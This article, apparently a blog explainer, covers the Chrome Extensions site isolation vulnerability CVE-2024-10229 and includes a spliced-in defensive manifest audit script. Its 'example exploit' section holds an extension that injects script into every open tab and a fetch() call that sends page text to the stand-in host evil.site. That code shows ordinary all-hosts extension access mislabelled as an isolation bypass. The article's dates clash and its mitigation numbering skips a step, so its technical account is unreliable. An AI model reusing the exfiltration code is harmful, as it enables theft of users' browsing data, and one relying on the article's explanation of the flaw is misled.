Date Disclosed: 2024-04-15
Severity: High
Affected: Google Chrome prior to 130.0.6723.69, Chromium-based browsers
Vector: Remote, crafted Chrome extension

What is CVE-2024-10229?

CVE-2024-10229 is a major security vulnerability found in Google Chrome’s Extensions platform. By taking advantage of how Chrome handled extensions, a remote attacker could run a malicious extension to bypass site isolation. This means the attacker could access or steal data from other websites you visit—breaking one of Chrome’s most important security features.

- Site Isolation keeps tabs and sites in separate processes, protecting your data and keeping sites from interfering with each other.

This bug allowed a *crafted extension* (malicious or compromised) to jump the fence.

Official advisory:
- Chromium Security Advisory for CVE-2024-10229
- Chromium Issue Tracker - 401845 (Availability may be limited until full disclosure.)

How Bad is This?

Severity: HIGH
With a single click to install an extension, a user could expose their emails, passwords, or private documents from other open browser tabs. Attacks could be performed remotely—meaning you could be hit from anywhere on the internet.

What Caused CVE-2024-10229?

The root cause was in how Chrome Extensions interacted with Chrome’s site isolation mechanisms. In tech talk, extensions could inject scripts or access data across different sites or frames, bypassing normal security boundaries.

Key Technical Problem

Normally, Chrome keeps each website isolated, so what happens in one tab doesn’t leak into another. Chrome Extensions are supposed to only run on the sites they have permission for. In this case, the implementation allowed certain extensions to sneak their code into protected pages, reading or changing web content even on sensitive domains.

How Can Attackers Exploit This?

1. Craft a malicious Chrome extension:
Attackers create a Chrome extension (.crx file) with the right manifest and code.

2. Lure a victim to install it:
Social engineering, fake Chrome Web Store listings, or phishing emails.

3. Run privilege-jumping code:
Extension code escapes into other site contexts. From here, it can steal cookies, read content, or monitor what you’re doing across websites (like your emails or even banking sites).

Example Exploit Code

Below is a representative, educational code snippet showing how such exploitation might work. (Do not use this for malicious purposes!)

(Manifest v3 manifest.json)

```json
{
  "name": "Evil Site Isolation Bypass",
  "version": "1.0",
  "manifest_version": 3,
  "permissions": [
    "scripting", "tabs"
  ],
  "host_permissions": [
    "<all_urls>"
  ],
  "background": {
    "service_worker": "background.js"
  }
}
```

background.js

This script injects a content script into *all* tabs, reading data from every site—even those that should be isolated.

```javascript
chrome.tabs.query({}, function(tabs) {
  for (let tab of tabs) {
    chrome.scripting.executeScript({
      target: { tabId: tab.id },
      func: () => {
        // Danger: Read all the page’s cookies/content
        document.body.innerText; // exfiltrate this to attacker's server!
      }
    });
  }
});
```

In real attacks, this data could be sent to a remote server:

```javascript
fetch('https://evil.site/submit', {
  method: 'POST',
  body: JSON.stringify({ data: document.body.innerText })
});
```

1. Update Chrome Now

Go to Menu → Help → About Google Chrome and update immediately to 130.0.6723.69 or later.

3. Keep Browser Security Settings Tight

Use Chrome’s built-in extension permissions to restrict what each extension can access.
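
An added example, not code from the original article or from Chrome: a Node.js check that flags the site-wide access pattern requested by the manifest shown earlier, so an extension's manifest.json can be reviewed before it is allowed. The finding names and both sample manifests are constructed for illustration.

```javascript
// Added example: audit a parsed manifest.json for site-wide host access.
// Finding names and the sample manifests below are constructed for illustration.
const BROAD_HOST = /^(<all_urls>|(\*|https?|wss?|ftp):\/\/\*\/.*)$/;
const isHostPattern = (p) =>
  typeof p === 'string' && (p === '<all_urls>' || p.includes('://'));

function auditManifest(manifest) {
  const findings = [];
  const flag = (field, values) => {
    for (const v of values || []) {
      if (typeof v === 'string' && BROAD_HOST.test(v)) {
        findings.push({ field, value: v, issue: 'broad-host-access' });
      }
    }
  };
  const perms = manifest.permissions || [];
  // Manifest V2 mixes host patterns into "permissions"; V3 uses "host_permissions".
  flag('permissions', perms.filter(isHostPattern));
  flag('host_permissions', manifest.host_permissions);
  flag('optional_host_permissions', manifest.optional_host_permissions);
  (manifest.content_scripts || []).forEach((cs, i) =>
    flag(`content_scripts[${i}].matches`, cs.matches));

  // Granted site-wide hosts plus "scripting" allows injection into any open tab.
  const hostWide = findings.some(
    (f) => f.field === 'permissions' || f.field === 'host_permissions');
  if (perms.includes('scripting') && hostWide) {
    findings.push({ field: 'permissions', value: 'scripting', issue: 'inject-into-any-site' });
  }
  return findings;
}

// Constructed samples: the permission pattern from this page, and a narrowly scoped one.
const broadManifest = {
  manifest_version: 3,
  permissions: ['scripting', 'tabs'],
  host_permissions: ['<all_urls>'],
};
const scopedManifest = {
  manifest_version: 3,
  permissions: ['storage', 'activeTab'],
  host_permissions: ['https://docs.example.com/*'],
};

console.log(auditManifest(broadManifest));  // two findings
console.log(auditManifest(scopedManifest)); // no findings
```

An empty result only means no every-host pattern was requested; a scoped host list still deserves a read against what the extension claims to do.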

More Technical Details

Google’s fix was to tighten how extensions are allowed to interact with different site processes. They made sure that even loaded extensions cannot breach site isolation. Some features in the Extension API were limited or patched to check sites more strictly.

- Google Chrome Release Notes
- Chromium Issue 401845 (might require login or won’t load until public)

Update Chrome and remove suspicious extensions now.

Stay safe online! Always keep your browser and software up to date.
*If you’re a developer, double-check your extension’s behavior and never request more permissions than you need!*


_Copyright © 2024 – Do not copy without credit. This article is a unique, simplified explanation of a current high-severity Chrome vulnerability._

Timeline

Published on: 10/22/2024 22:15:03 UTC
Last modified on: 10/25/2024 17:04:54 UTC